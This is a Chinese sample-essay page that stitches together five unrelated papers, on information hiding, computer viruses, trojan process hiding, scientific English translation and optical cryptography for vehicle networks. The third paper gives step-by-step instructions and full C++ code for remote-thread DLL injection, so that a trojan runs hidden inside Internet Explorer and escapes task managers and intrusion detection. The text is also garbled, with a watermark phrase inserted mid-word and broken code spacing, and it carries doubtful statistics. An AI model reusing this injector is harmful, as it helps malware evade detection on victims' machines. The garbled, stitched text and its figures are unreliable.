首页 > 文章中心 > 隐藏技术论文

隐藏技术论文范文精选

隐藏技术论文

隐藏技术论文范文第1篇

1、信息隐藏技术的透明性

信息隐藏的主要目的是让信息透明,将信息嵌入一定的载体中,使得信息无法被第三方识别,就像消失了一样,可以保证信息的安全性。但是信息隐藏技术不但能够将信息隐藏于无形中,还要能将信息恢复,并且恢复后的信息要与隐藏前一致,没有发生任何损失或破坏,保证其信息隐藏前后的完整性。

2、信息隐藏技术的防御攻击性

信息隐藏技术防御攻击的能力一定要很高,因为,网络通信中,信息技术会经常受到有意或无意的攻击,比如删除、非法攻击或篡改等,都会对隐藏的信息造成损害,因此,信息隐藏技术必须具备高的防御能力。此外,网络通信中经常出现信号处理,如调制、有损压缩、滤波等,也会对隐藏的信息造成破坏,所以,为了保障信息的安全,信息隐藏技术一定要拥有更强大的防御攻击的能力。

3、信息隐藏技术的嵌入量大

信息隐藏的目的是为了无法被其他人或电脑发现,为了提高信息隐藏的技术,要将需要隐藏的信息放入一个相对数据量大的载体中,因此,信息隐藏要选择一个信息量大的数据中。此外,还要满足隐藏算法所需要的空间,从而保证信息隐藏的无法识别,保证信息的安全。

4、信息隐藏技术的自我恢复

信息隐藏后一旦需要提取,要能够不需要原始载体信号,便可以从载体中将隐藏的信号提取出来,保证信息的完整。另外,将隐藏的信息提取出来后,要保证信息经过一系列的提取过程后,仍能保证信息的完好无损,有效保证信息的安全性。因此,信息隐藏技术必须要有高度的自我恢复能力。

二、网络通信中信息隐藏的技术途径

1、信息隐藏于音频信号中

将信息隐藏于音频信号中,是将嵌入信息所采用的域为依据,可将语音信息隐藏划分为时域音频隐藏、频域音频隐藏、离散余弦变换域音频隐藏三种。时域音频隐藏技术就是将音频信号的频率、幅度或结果进行处理,然后将其隐藏于音频信号中,是一种简单的隐藏技术。频域音频隐藏技术是将要隐藏的音频文件根据频域的区域进行处理,将需要隐藏的信息以伪噪声的方式嵌于音频信号中,从而达到隐藏的目的,并且很难被识别和发现。离散余弦变化域音频隐藏技术是需要隐藏的信息变换格式,再将变换后的信息嵌于音频信号中,起到深度隐藏的目的。此外,随着网络技术的发展和不断创新,音频信号隐藏还包括小波域隐藏技术和压缩域隐藏技术,效果都很好。

2、信息隐藏于图像信号中

信息隐藏于图像信号中主要有两种方式,一是空间域隐藏技术,就是利用空间替换法,将需要隐藏的信息替换到载体中,并且嵌入不重要的位置,例如将秘密信息嵌入像素点最低的有效位,实现信息的替换,从而保证信息的安全性;二是变换域隐藏技术,就是将需要隐藏的信息转换到变换域范围,变换域是一直在变动的,因此,秘密信息进入变换域后悔进行反复变换,从而使得信息隐匿其中,很难被发现。变换域隐藏技术相比于空间域隐藏技术拥有更好的隐藏效果,并且安全性高、防御攻击力强、自我恢复好,更适合信息的隐藏。

3、信息隐藏于文本信号中

信息隐藏于文本信息中,主要是将信息拆分为极其细碎的结构,然后将每个小部分分别隐藏于文本信息中,从而起到信息隐藏的目的。但是,文本信号需要庞大的数据量才能实现更好的信息隐藏,因此,在实际的应用中,应用率很低。此外,在网络通信中,音频信号隐藏技术和图像信号隐藏技术的隐蔽性远远好于文本信号,所以,文本信号隐藏信息的使用率低;同时,也由于文本信号的防御能力差、自我修复力也差,使得文本信号隐藏信息的安全性降低,不利于信息的隐藏。

三、结束语

隐藏技术论文范文第2篇

0引言

计算机网络是信息社会的基础,已经进入了社会的各个角落,经济、文化、军事和社会生活越来越多的依赖计算机网络。然而,计算机在给人们带来巨大便利的同时,也带来了不可忽视的问题,计算机病毒给网络系统的安全运行带来了极大的挑战。2003年1月25日,突如其来的“蠕虫王”病毒,在互联网世界制造了类似于“9.11”的恐怖袭击事件,很多国家的互联网也受到了严重影响。同样,前两年李俊制作的“熊猫烧香”病毒再次为计算机网络安全敲起了警钟。据美国计算机权威组织报告,全球已发现的计算机病毒总和超过6万多种,而且每天还有100多种以上的新病毒问世,同时计算机病毒在2000年造成的全球经济损失高达1.6万亿美元。因此,研究计算机病毒与防治就显得极具紧迫,意义重大。

1计算机病毒的含义

关于计算机病毒的定义,目前国内外有各种各样的定义,但在《中华人民共和国计算机系统安全保护条例》中对病毒是这样定义的:“编制或在计算机程序中插入的破坏计算机功能或者数据,影响计算机使用,并且能够自我复制的一组计算本论文由整理提供机指令或者程序代码”。因此,像炸弹、蠕虫、熊猫烧香等均可称为计算机病毒。

2计算机病毒的特征

计算机病毒是一段特殊的程序。除了与其他程序一样,可以存储和运行外,计算机病毒还有感染性、潜伏性、可触发性、破坏性衍生性等特征。下面简单就计算机病毒的特性加以介绍:

①感染性。计算机病毒的感染性也称为寄生性,是指计算机病毒程序嵌入到宿主程序中,依赖于宿主程序的执行而生成的特性。计算机病毒的感染性是计算机病毒的根本属性,是判断一个程序是否为病毒程序的主要依据。②隐蔽性。隐蔽性是计算机病毒的基本特征之一。从计算机病毒隐藏的位置来看,不同的病毒隐藏在不同的位置,有的隐藏在扇区中,有的则以隐藏文件的形式出现,让人防不胜防。③潜伏性。计算机病毒的潜伏性是指其具有依附于其他媒体而寄生的能力,通过修改其他程序而把自身的复制体嵌入到其他程序或者磁盘的引导区甚至硬盘的主引导区中寄生。④可触发性。计算机病毒一般都具有一个触发条件:或者触发其感染,即在一定的条件下激活一个病毒的感染机制使之进行感染;或者触发其发作,即在一定的条件下激活病毒的表现攻击破坏部本论文由整理提供分。⑤衍生性。计算机病毒的衍生性是指计算机病毒的制造者依据个人的主观愿望,对某一个已知病毒程序进行修改而衍生出另外一中或多种来源于同一种病毒,而又不同于源病毒程序的病毒程序,即源病毒程序的变种。这也许就是病毒种类繁多、复杂的原因之一。⑥破坏性。计算机病毒的破坏性取决于计算机病毒制造者的目的和水平,它可以直接破坏计算机数据信息、抢占系统资源、影响计算机运行速度以及对计算机硬件构成破坏等。正是由于计算机病毒可怕的破坏性才使得计算机病毒令人如此恐怖。

3计算机病毒的类型

对于计算机病毒的类型,不同的范畴有着不同的类型定义。下面就简单介绍一种计算机病毒的分类:

①引导区病毒。引导区病毒隐藏在硬盘或软盘的引导区,当计算机从感染了引导区病毒的硬盘或软盘启动,或当计算机从受感染的软盘里读取数据时,引导区病毒就开始发作。②文件型病毒。文件型病毒寄生在其他文件中,常常通过对病毒的编码加密或是使用其他技术来隐藏自己。③脚本病毒。脚本病毒依赖一种特殊的脚本语言来起作用,同时需要主软件或是应用环境能够正确地识别和翻译这种脚本语言中嵌套的命令。④“特洛伊木马”程序。特洛伊木马程序比起其他各种恶意的软件来说都更加了解用户的心里状态——这种程序的创作者用在怎么样使运行特洛伊木马程序的功夫可能和他们创作木马的时间一样多。

4计算机病毒的发展趋势

传统的计算机病毒是指利用网络进行传播的一类病毒的总称。而现在网络时代的计算机病毒,已经不是如此单纯的一个概念,它被溶进了更多的东西。如今的计算机病毒是指以网络为平台,对计算机安全产生安全的所有程序的总和。

4.1“间谍”式木马病毒出现。如果说传统木马病毒是个骗子的话,那么现在的木马病毒则更像一个活生生的间谍。如今“间谍本论文由整理提供”式木马病毒一般是指利用系统漏洞进入用户的计算机系统,通过修改注册表自动启动,运行时故意不被察觉,将用户计算机系统中的所有信息都暴露在网络中的病毒程序。

4.2可以自我完善的蠕虫病毒出现。如今的蠕虫病毒除了利用网络缺陷外,更多地利用了一些新的骗人技术。如:“密码”病毒是利用人们的好奇心理,诱使用户来主动运行病毒,等等。

4.3黑客程序。随着网络的发展与人们日益增长的安全需求,必须重新来审视黑客程序。黑客程序一般都有攻击性,它会利用漏洞在远程控制计算机,甚至直接破坏计算机。黑客程序会与木马程序相结合,对计算机安全构成威胁,所以黑客程序也是一种计算机病毒。

总之,现在的计算机病毒都呈现出隐蔽性、欺骗性等复杂的特点,让人们在毫无警觉的情况下使计算机系统遭到破坏。

5计算机病毒的预防措施

5.1引导型病毒的预防引导性病毒一般在启动计算机时,优先获得控制权,强占内存。通常情况下,只要不用软盘或者只用“干净的”软盘启动系统,是不会染上引导型病毒的。对软盘进行写保护,则可以很好地保护软盘不被非法写入,从而不被感染上启动型病毒。但要保护硬盘的安全,除了从操作方面注意外,只有采取用软盘来保护硬盘的措施。

5.2文件型病毒的预防文本论文由整理提供件型病毒的预防方法是在源程序中增加自检及清楚病毒的功能。这种方法可以使得可执行文件从一生成就具有抗病毒的能力,从而可以保证可执行文件的干净。自检清除功能部分和可执行文件的其他文件融为一体,不会和程序的其他功能冲突,也使得病毒制造者无法造出针对性的病毒来。可执行文件染不上病毒,文件型病毒就无法传播了。

5.3个性化的预防措施计算机病毒的感染总是带有普遍性的或大众化的,以使计算机病毒范围尽可能的广,所以有时一些个性化的处理可能对计算机病毒的预防或者免疫具有非常好的效果。如:给一些系统文件改名或扩展名;对一些文件甚至子目录加密。使得计算机病毒搜索不到这些系统文件。

5.4加强IT行业从业人员的职业道德教育关于计算机病毒的防治,除了从技术层面来加以维护和防治外,加强对计算机从业人员(在此指的是IT行业的“精英”,可以制造计算机病毒的高智商人群)的职业道德教育显得也极其重要。如果他们有着很高的职业道德,他们就不会对网络安全构成威胁,令全世界计算机用户为之紧张。反而可以可以在计算机领域为人类作出积极而巨大的贡献。

5.5完善计算机病毒防治方面的法律法规在加强对计算机行业高智商从业人员进行道德教育的同时,也应该完善计算机病毒防治方面的相关法律法规,充分发挥法律法规的约束作用。目前我国已经制定了《中华人民共和国计算机信息系统安全保护条例》、《计算机信息系统安全专用产品检测和销售许可证管理办法》等相关法律法规,此外《中华人民共和国刑法》也对危害网络安全的行为作出了规定和惩罚。超级秘书网

5.6加强国际交流与合本论文由整理提供作在经济全球化的宏观背景下,计算机网络世界早已融为一体,跨国进行计算机病毒攻击也已出现。为此,世界各国要本着维护计算机网络安全运行的高度,加强交流与合作,共同打击计算机病毒犯罪,此举已显得刻不容缓。

6结语

随着计算机网络技术的不断发展,计算机给人类经济、文化、军事和社会活动带来更多便利的同时,也带来了相当巨大的安全挑战。现代信息网络面临着各种各样的安全威胁,有来自网络外面的攻击,比如网络黑客、计算机病毒等。因此合理有效的预防是防治计算机病毒最有效,最经济省力,也是最应该值得重视的问题。研究计算机病毒与预防有利于我们正确认识、感知、防范计算机病毒的攻击,以保护计算机网络安全,使得计算机网络真正发挥其积极的作用,促进人类经济、文化、军事和社会活动的健康。

参考文献:

[1]卓新建,郑康锋,辛阳.计算机病毒原理与防治[M].北京邮电大学出版社,2007,(8):第二版.

[2]郝文化.防黑反毒技术指南[M].机械工业出版社,2004,(1):第一版.

[3]程胜利,谈冉,熊文龙等.计算机病毒与其防治技术[M].清华大学出版社,2004,(9):第一版.

[4]张仁斌,李钢,侯整风.计算机病毒与反病毒技术[M].清华大学出版社,2006(6).

隐藏技术论文范文第3篇

摘要进程的隐藏一直是木马程序设计者不断探求的重要技术,本文采用远程线程技术,通过动态链接库方法,较好地解决了这一问题,通过远程线程将木马作为线程隐藏在其他进程中,从而达到隐藏的目的。

关键字进程线程木马动态链接库

木马程序(也称后门程序)是能被控制的运行在远程主机上的程序,由于木马程序是运行在远程主机上,所以进程的隐藏无疑是大家关心的焦点。

本文分析了WindowsNT/2000系统下进程隐藏的基本技术和方法,并着重讨论运用线程嫁接技术如何实现WindowsNT/2000系统中进程的隐藏。

1基本原理

在WIN95/98中,只需要将进程注册为系统服务就能够从进程查看器中隐形,可是这一切在WindowsNT/2000中却完全不同,无论木马从端口、启动文件上如何巧妙地隐藏自己,始终都不能躲过WindowsNT/2000的任务管理器,WindowsNT/2000的任务管理器均能轻松显示出木马进程,难道在WindowsNT/2000下木马真的再也无法隐藏自己的进程了?我们知道,在WINDOWS系统下,可执行文件主要是Exe和Com文件,这两种文件在运行时都有一个共同点,会生成一个独立的进程,寻找特定进程是我们发现木马的方法之一,随着入侵检测软件的不断发展,关联进程和SOCKET已经成为流行的技术,假设一个木马在运行时被检测软件同时查出端口和进程,我们基本上认为这个木马的隐藏已经完全失败。在WindowsNT/2000下正常情况用户进程对于系统管理员来说都是可见的,要想做到木马的进程隐藏,有两个办法,第一是让系统管理员看不见你的进程;第二是不使用进程。本文以第二种方法为例加以讨论,其基本原理是将自已的木马以线程方式嫁接于远程进程之中,远程进程则是合法的用户程序,这样用户管理者看到的只是合法进程,而无法发现木马线程的存在,从而达到隐藏的目的。

2实现方法

为了弄清实现方法,我们必须首先了解Windows系统的另一种"可执行文件"----DLL,DLL是DynamicLinkLibrary(动态链接库)的缩写,DLL文件是Windows的基础,因为所有的API函数都是在DLL中实现的。DLL文件没有程序逻辑,是由多个功能函数构成,它并不能独立运行,一般都是由进程加载并调用的。因为DLL文件不能独立运行,所以在进程列表中并不会出现DLL,假设我们编写了一个木马DLL,并且通过别的进程来运行它,那么无论是入侵检测软件还是进程列表中,都只会出现那个进程而并不会出现木马DLL,如果那个进程是可信进程,(例如浏览器程序IEXPLORE.EXE,没人会怀疑它是木马吧?)那么我们编写的DLL作为那个进程的一部分,也将成为被信赖的一员,也就达到了隐藏的目的。

运行DLL方法有多种,但其中最隐蔽的方法是采用动态嵌入技术,动态嵌入技术指的是将自己的代码嵌入正在运行的进程中的技术。理论上来说,在Windows中的每个进程都有自己的私有内存空间,别的进程是不允许对这个私有空间进行操作的,但是实际上,我们仍然可以利用种种方法进入并操作进程的私有内存。动态嵌入技术有多种如:窗口Hook、挂接API、远程线程等,这里介绍一下远程线程技术,它只要有基本的进线程和动态链接库的知识就可以很轻松地完成动态嵌入。

远程线程技术指的是通过在另一个进程中创建远程线程的方法进入那个进程的内存地址空间。我们知道,在进程中,可以通过CreateThread函数创建线程,被创建的新线程与主线程(就是进程启动时被同时自动建立的那个线程)共享地址空间以及其他的资源。但是很少有人知道,通过CreateRemoteThread也同样可以在另一个进程内创建新线程,被创建的远程线程同样可以共享远程进程(是远程进程)的地址空间,所以,实际上,我们通过一个远程线程,进入了远程进程的内存地址空间,也就拥有了那个远程进程相当的权限。

3实施步骤

1)用Process32Next()函数找到宿主进程,获取宿主进程ID,并用

OpenProcess()函数打开宿主进程。

2)用VirtualAllocEx()函数分配远程进程地址空间中的

内存。

3)用WriteProcessMemory()函数将待隐藏的DLL的路径名。

4)拷贝到步骤二已经分配的内存中。

5)用GetProcAddress()函数获取LoadlibraryA()函数的实地址(在kernel32.dll中)。

6)用CreateRemoteThread()函数在远程进程中创建一个线程。

7)它调用正确的LoadlibraryA()函数。

8)为它传递步骤二中分配的内存地址。

4具体实例

下面是在C++Builder4.0环境下编写的运用远程线程技术隐藏木马的程序代码:

#include<vcl.h>

#include<windows.h>

#include<stdio.h>

#include<tlhelp32.h>//该头文件包涵了进程操作的API函数

#pragmahdrstop

#include"Unit1.h"

#pragmapackage(smart_init)

#pragmaresource"*.dfm"

InsistingpszLibFileName;//存放待隐藏的DLL文件名

HANDLEhProcessSnap=NULL;//进程快照句柄

HANDLEhRemoteProcess;//远程进程句柄

LPVOIDpszLibFileRemote;//远程进程中分配给文件名的空间

HMODULEphmd;//存放kernel32.dll句柄

HANDLEhRemoteThread1=NULL;//存放远程线程句柄

TForm1*Form1;

//---------------------------------------------------------

__fastcallTForm1::TForm1(TComponent*Owner)

:TForm(Owner)

{

}

//---------------------------------------------------------

void__fastcallTForm1::Button1Click(TObject*Sender

{

PROCESSENTRY32pe32={0};

DWORDdwRemoteProcessId;

hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

//打开进程快照

if(hProcessSnap==(HANDLE)-1)

{

MessageBox(NULL,"CreateToolhelp32Snapshotfailed","",MB_OK);

exit(0);

}//失败返回

pe32.dwSize=sizeof(PROCESSENTRY32);

if(Process32Fi

rst(hProcessSnap,&pe32))//获取第一个进程

{

do{

AnsiStringte;

te=pe32.szExeFile;

if(te.Pos("iexplore.exe")||te.Pos("IEXPLORE.EXE"))

//找到宿主进程,以IEXPLORE.EXE为例

{dwRemoteProcessId=pe32.th32ProcessID;

break;

}

}

while(Process32Next(hProcessSnap,&pe32));//获取下一个进程

}

else

{

MessageBox(NULL,"取第一个进程失败","",MB_OK);

exit(0);

}

hRemoteProcess=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM

_OPERATION|PROCESS_VM_WRITE,FALSE,dwRemoteProcessId);

//打开远程进程

pszLibFileName=GetCurrentDir()+"\\"+"hide.dll";

//假设hide.dll是待隐藏的进程

intcb=(1+pszLibFileName.Length())*sizeof(char);//计算dll文件名长度

pszLibFileRemote=(PWSTR)VirtualAllocEx(hRemoteProcess,NULL,cb,

MEM_COMMIT,PAGE_READWRITE);

//申请存放文件名的空间

BOOLReturnCode=WriteProcessMemory(hRemoteProcess,

pszLibFileRemote,(LPVOID)pszLibFileName.c_str(),cb,NULL);

//把dll文件名写入申请的空间

phmd=GetModuleHandle("kernel32.dll");

LPTHREAD_START_ROUTINEfnStartAddr=(LPTHREAD_START_ROUTINE)

GetProcAddress(phmd,"LoadLibraryA");

//获取动态链接库函数地址

hRemoteThread1=CreateRemoteThread(hRemoteProcess,NULL,0,

pfnStartAddr,pszLibFileRemote,0,NULL);

//创建远程线

if(hRemoteThread1!=NULL)

CloseHandle(hRemoteThread1);//关闭远程线程

if(hProcessSnap!=NULL)

CloseHandle(hProcessSnap);//关闭进程快照

}

该程序编译后命名为RmtDll.exe,运行时点击界面上的按钮即可。

至此,远程嵌入顺利完成,为了试验我们的hide.dll是不是已经正常地在远程线程运行,我同样在C++Builder4.0环境下编写并编译了下面的hide.dll作为测试:

nclude<vcl.h>

#include<windows.h>

#pragmahdrstop

#pragmaargsused

BOOLWINAPIDllEntryPoint(HINSTANCEhinst,unsignedlongreason,void*lpReserved)

{

charszProcessId[64];

switch(reason)

{

caseDLL_PROCESS_ATTACH:

{//获取当前进程ID

itoa(GetCurrentProcessId(),szProcessId,10);

MessageBox(NULL,szProcessId,"RemoteDLL",MB_OK);

break;

}

default:

}

returnTRUE;

}

当使用RmtDll.exe程序将这个hide.dll嵌入IEXPLORE.EXE进程后假设PID=1208),该测试DLL弹出了1208字样的确认框,同时使用PS工具

也能看到:

ProcessID:1208

C:\WINNT\IEXPLORE.EXE(0x00400000)

……

C:\WINNT\hide.dll(0x100000000)

……

这证明hide.dll已经在IEXPLORE.EXE进程内正确地运行了。上面程序的头文件由编译器自动生成,未作改动,故略之。

5结束语

进程隐藏技术和方法有很多,而且这一技术发展也相当快,本文仅从一个侧面加以讨论,希望通过这一探讨让我们对进程隐藏技术有一个更清楚的认识,同时也为我们防范他人利用进程隐藏手段非法入侵提供参考,本文抛砖引玉,不当之处诚恳批评指正。

参考文献

隐藏技术论文范文第4篇

在英语和汉语中,定语的使用方式是不同的。汉语中多前置定语,主要是用“的”把修饰语和中心词连接起来。而在英语中,更多是运用后置定语来修饰中心语。在科技英语中,后置定语的应用是相当广泛的,而且其种类也相当多。下面将就科技英语常使用的几种后置定语做出研究。

(一)介词短语作后置

定语介词和宾语可以组成介词短语用作后置定语。例:Researchersatthoseinstitutessuggestthatthetrendwillcontinue.译文:这些协会中的研究者认为这种趋势将会继续下去。其中介词短语“atthoseinstitutes”作“researchers”的后置定语。

(二)形容词作后置定语

例:Forexample,inanalkalinemediumapplicabletoflotationcircuits,aferricdihydroxyethylxanthatecanform.译文:例如,在一种适合浮选回路的碱性介质中可以形成一个铁二羟乙基黄原酸。该句中形容词“applicable”作“medium”的后置定语,表示特征、属性。

(三)分词短语作后置定语分词有现

在分词和过去分词两种,二者皆可作后置定语,通常放在被修饰词后。例:Jointdrugresearchconductedbymultiplecompaniescaneffectivelylowercostsandrisk…译文:由多个企业管理的联合药物科研可以有效地降低成本和风险……本句中过去分词“conducted”作后置定语,修饰“research”。

(四)动词不定式短语作后置定语动词不定式

短语可作后置定语来修饰名词或代词。例:Andthesimplestwaytodothiswouldbetoofferprizesfornewdrugs.译文:做这件事的最简单办法是为新药品提供奖励。句中的不定式短语“todothis”修饰名词“way”。

二、常见句型的译法科技

文章中经常使用一些体现科技文严谨,清晰的句型,这是科技论文区别于其它类型文章的特点之一。

(一)“it”做形式主语

在汉译英时,如果出现人做主语表达看法观点,通常省略真正主语,用it做形式主语。Itisassertedthat…据主张Ithasbeenshownthat…据证明Itisgenerallyconsideredthat…一般认为例如我们翻译一篇文章出现“人才培养与社会需求存在较大差距,主要体现在以下几方面”我们将其后半句翻译成“Itismainlyreflectedinfollowingaspects.”就运用了it充当形式主语这一结构,是比较得体的。

(二)被动态结构句型

在英译汉时,英语科技论文中出现阐述客观事实的被动态结构,通常情况下我们将其译成“……是……的”这一判断句结构,因为我们汉语中通常运用这一句式来形容和描述客观情况,这样和英语中的被动语态是相联系的。例:Thetraditionalareasofthemathematicalsciencesarecertainlyin-cluded.译文:数学科学的传统领域很确定是包括在内的。

三、被动句译法

英国利兹大学JohnSwales曾统计指出,科技英语中的谓语至少三分之一是被动语态。而在现代汉语的表达中,我们多习惯应用主动语态,这是因为在历史上,汉语中的被动句主要用来表达对于主语来说是如意或者不希望发生的事情。通常情况下,即使我们想表达被动的含义,通过一些形式上的变化我们仍可应用主动句。由此可见,被动语句字汉语中的使用范围比在英语中小得多。因此,被动句和主动句的转换,成为翻译科技论文的一个重点技巧。甚至可以毫不夸张的说,被动语态的使用不得体直接可以影响到翻译文档的质量。为什么科技英语广泛使用被动句呢?首先,主动结构多为一、二人称,给读者以主观臆断的感觉,带有着更多的主观色彩。众所周知,科技论文注重强调客观事实,强调准确性,因此倾向于使用第三人称被动语态。例如在<FlotationKineticsofapyriticGoldOre>(黄铁矿型金矿的浮选动力学)这篇论文时,其中”Itcanbecon-cludedfromabovethattheflotationmechanismsofgoldandpyritewithxan-thateshaveimportantcommonfeatures.”如果写成“Wecanconcludefrom…”显然有了主观色彩。其次,被动结构更能突出要说明的强调的事物,或者当宾语比主语更为重要时,置于主语的位置则起到让读者一目了然的作用,更便于抓住重点。再或者主语不明时都可以使用被动结构。例如在翻译一篇有关教育的论文时出现这样一句话“,因此,在计算机、网络、多媒体、人工智能等技术的推动下,高校网络教育迅速发展。”很明显地,这里作者想要突出强调高效教育迅速发展的原因,因此我们运用被动结构将其做如下翻译:Therefore,drivenbytherapiddevelopmentofthecomputer,network,multi-media,artificialintelligencetechnology,networkeducationincollegesandu-niversitieshasbeenquicklydeveloped.这样使强调部分一目了然。此外,大多数情况下,相比于主动结构,被动结构更为简短。而简洁明了也符合科技论文的一大特点。

四、长句翻译分析

由于科技英语本身具有表达客观准确、逻辑性强、结构严谨这三个重要特点,在科技英语中必不可少地存在着一些结构复杂、层次繁多的长句。这些长句大量使用各类短语和从句对主要内容进行修饰限制和补充说明,同时也造成了句子结构复杂、层次繁多,使得科技英语长句的翻译成了一个比较复杂、棘手的难题。针对科技英语中长句的翻译,采用以下的“三步走战略”会使得翻译的过程思路清晰,简单易行:

(1)首先理清句子结构层次,分析清语法和逻辑关系,准确理解句子的原意。

(2)其次,根据第一步中的分析,从最常用的拆句法、顺序法、逆序法和综合法等翻译技巧与方法中优先选择出比较合适的一种或几种。(3)最后一步,灵活变通,具体句子具体分析。在表达句子原意时,不要过多地受原句中的结构形式的束缚,在保持原意的基础上结合汉语的表达习惯对原句的结构层次做出适当的调整,使得译出的句子既与原文意义契合,又流畅可读,通俗易懂。例:Theenormoustaskofprocessingandassessingtheimagesfrommulti-pleclosed-circuitrecordingsissometimesdonebymathematicaltoolsthatau-tomaticallyanalyzemovementpatternstodeterminewhichpeoplearelikelytobecarryinghiddenweaponsorexplosives.分析:翻译这个长句时,第一步先去分析句子的语法结构。系动词“is”之前为句子的主语部分,主语的中心词为“task”,介词“of”后边为较长的修饰限定语。句中的“that”引导了一个定语从句对先行词“tools”进行限定性的说明。第二步,基于对句子结构的分析,选择一种适合的翻译方法。针对结构并非特别复杂的例句,我们暂选用顺译法,这样译出的汉语为“:这个处理与反馈来自于多闭路记录的图像的艰巨任务有时也由可以自动分析运动模式去判定哪个人可能携带了隐藏着的武器或爆炸物的数学工具来处理。”第三步,通过进一步结合汉语的表达习惯,会发现译文为一个简单句,但里面的修饰成分较多,使得表述有些混乱,不便于读者理解。因此在保持原文层次和语义关系的基础上,我们可按照汉语多用短句的习惯,把长句中的从句或短语化为句子,分开来叙述,这样就使得译文更加通畅连贯。最终的译文为:“处理与反馈来自于多闭路记录的图像是一项艰巨的任务。而这样的艰巨任务有时候可以由数学工具来完成。这些数学工具可以通过自动分析运动模式去判定哪个人可能携带了隐藏着的武器或爆炸物。”

五、结语

隐藏技术论文范文第5篇

0引言

车联网是指装载在车辆上的电子标签通过无线射频等识别技术,实现在信息网络平台上对所有车辆的属性信息和静、动态信息进行提取和有效利用,并根据不同的功能需求对所有车辆的运行状态进行有效的监管和提供综合服务。采用传统加密技术,车联网读写器和标签及其之间的通信过程存在安全性和高效性的矛盾问题,利用光学密码技术可以很好的解决这一矛盾问题。

1车联网读写器和标签安全问题

车联网系统中,针对标签的攻击有:克隆攻击、欺骗攻击、非授权访问、拒绝服务攻击、破坏标签攻击等。针对读写器的攻击有:物理攻击、假冒攻击、修改配置文件攻击等。针对标签和读写器之间通信的攻击有:窃听攻击、重放攻击、篡改攻击、干扰或破坏正常通信攻击等。车联网系统中,针对标签、读写器及其之间通信的主要攻击,产生原因主要基于以下两点。(1)标签计算能力弱。RFID标签供电能力和存储空间极其有限,较难具备足够安全计算能力以抵抗读取、篡改、删除标签所存数据攻击。在没有足够可信任的安全机制的保护下,标签的安全性、有效性、完整性、可用性、真实性都得不到保障。(2)无线网络的脆弱性。标签层和读写器层采用无线射频信号进行通信,使传递的信息暴露于大庭广众之下,而无线网络固有的脆弱性使RFID系统很容易遭受多种形式攻击。

2光学密码

基于光学理论与方法的数据加密和信息隐藏技术是近年来在国际上开始起步发展的新一代信息安全理论与技术。光学技术在信息安全领域的最早应用,可以追溯到20世纪七十年代。当时在美国出现了一些光学安全技术专利,主要用于身份验证、防伪等领域。九十年代以后,计算机硬件、软件的发展以及Internet的产生将人们带入信息社会。各行各业对信息技术广泛应用,自然迫切地需要一种安全、高效的信息加密技术。传统加密技术主要依靠计算机或数字信号处理器(digitalsignalprocessing,DSP)等电子手段来实现,这些方法受到速度和成本的限制。一些研究人员自然地转向利用光学或光电方法加密。1995年,BahramJavidi等人提出了双随机相位编码方法,这种方法具有较好的安全性和鲁棒性。从此光学密码进入快速发展时期。与电子手段相比,现有的光学信息安全系统还存在一些缺点,它们往往可实施性较差,灵活性与稳定性都有待提高。

并行数据处理是光学系统固有的能力,如在光学系统中一幅二维图像的每一个像素都可以同时地被传播和处理。当进行大量信息处理时,光学系统的并行处理能力明显占有绝对的优势,并且,所处理的图像越复杂,信息量越大,这种优势就越明显。同时,光学加密装置比电子加密装置具有更多的自由度,信息可以被隐藏在多个自由度空间中。在完成数据加密或信息隐藏的过程中,可以通过计算光的干涉、衍射、成像、全息等过程,对涉及的波长、焦距、振幅、相位、偏振态、空间频率及光学元件的参数等进行多维编码。与传统的基于数学的计算机密码学相比,光学密码具有多维密钥空间、天然的并行性等优势。

光学密码还能够抵抗边信道攻击(sidechannelattack,SCA)。边信道攻击是指分析计算时间、程序运行故障、电路功率消耗、电磁辐射等泄露出来的信息,获得芯片内部运算情况,从而破译密钥的攻击方法,分为时间攻击、故障攻击、能量攻击和电磁攻击等。这些攻击方法避开了复杂的密码算法本身,比传统的数学攻击方法有效,因此给密码设备带来了严重的威胁。目前国内外防范边信道攻击主要以牺牲效率为代价。而光学密码实现设备,由于低功耗、低辐射,可以有效抵抗边信道攻击。

3光学密码在车联网中的应用

3.1光学加密ID标签

光学加密ID标签有两部分组成,标识区和信息区。标识区由ROM组成,存储惟一标识该车辆信息的密文。信息区由RAM组成,存储车辆所经过读写器的地理位置和时间的密文。标识区存储的标识信息包括车主虹膜信息(增加明文的安全性)+车主身份证号码(或单位编号)+汽车编号。光学加密标签可以防止对标签的篡改和伪造。这样可以保证某一车辆通过某地时,其身份的真实性。如果不加密,攻击者可以伪造标签前往某一限定区域,或者冒充他人车辆身份通过高速公路收费站,从而自己逃避收费,而给被冒充车主造成经济损失。另外,光学加密标签可以防止车主地理位置信息泄露。如果标签不加密,攻击者可以伪造读写器,从而获取车辆的行程信息,造成车主的隐私泄露,甚至危及其人身安全。信息区存储车辆路径信息的目的是防止车联网信息系统后台服务器数据库发生故障或欺诈用户的行为。比如高速公路收费系统,车辆所经过的高速公路段都记录于后台数据库中,如果数据库发生故障或被篡改,则可能给用户造成经济损失。另外,存储的是密文,而不是明文的目的是防止用户篡改信息区内容,从而防止给高速公路收费单位造成经济损失。光学加密ID标签不仅可以起到类似传统密码的安全保密作用,而且可以在读写器端实时完成解密操作。在实时要求高的应用情景下,比如,高速公路不停车收费系统,光学密码可以取代传统密码。

3.2光学密码读写器

光学密码读写器负责读取光学加密ID标签中的标识信息,向光学加密ID标签信息区写入地理位置(比如收费站名称)和时间的密文,并将标识信息、地理信息、时间的密文同时上传至车联网中间件。

(1)读取标识信息

用户购车开户时,光学加密ID标签一并办理,用户车辆惟一标识信息密文一次性被写入标签标识区。当读写器读取到标识信息后,使用光学密码算法解密标识信息,如果明文满足规定的格式,则视为真实标签。

(2)写入地理、时间信息

读写器对于真实标签,将当前地理位置(收费站即收费站名字)和时间信息,采用光学密码算法加密,加密后将密文无线写入光学加密标签的信息区。读写器端加密过程的是实时的,不会造成处理延迟。传输过程中,由于信息是加密的,可以防止窃听。ID标签在被写入信息前对读写器真实性进行鉴别,确认读写器的真实身份后,才允许向信息区写入信息。

(3)信息上传

读写器将认定的真实标签的标识信息和地理、时间信息加密后上传至车联网中间件,中间件收到这些信息后做如下工作。将标识信息与服务器数据库做比较,如果相同,则将地理和时间信息存入用户数据库对应的存储区中;如果不同,则通知相应执法人员对相应车辆用户进行处理。总之,光学加密读写器整个工作过程涉及的加解密操作都是基于光学密码实现的,可以抵抗边信道攻击,保障光学密码读写器工作过程中敏感信息处理的安全性和实时性。